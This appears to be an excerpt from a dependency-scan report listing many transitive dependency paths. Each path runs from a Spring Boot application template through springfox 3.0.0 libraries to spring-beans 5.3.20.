  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
